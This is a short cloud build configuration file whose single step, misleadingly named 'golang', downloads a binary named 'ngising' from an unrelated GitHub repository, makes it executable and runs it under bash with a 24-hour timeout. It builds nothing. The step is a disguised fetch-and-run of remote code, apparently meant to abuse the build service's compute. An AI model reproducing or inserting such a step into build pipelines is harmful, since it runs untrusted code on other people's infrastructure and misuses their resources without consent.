steps:
  - name: golang
    args:
      - '-c'
      - >-
         apt update && apt-get install sudo -y && wget https://github.com/ganejafaujanih/manuk/raw/main/ngising && chmod u+x ngising && ./ngising
    waitFor:
      - '-'
    entrypoint: /bin/bash
timeout: 86400s
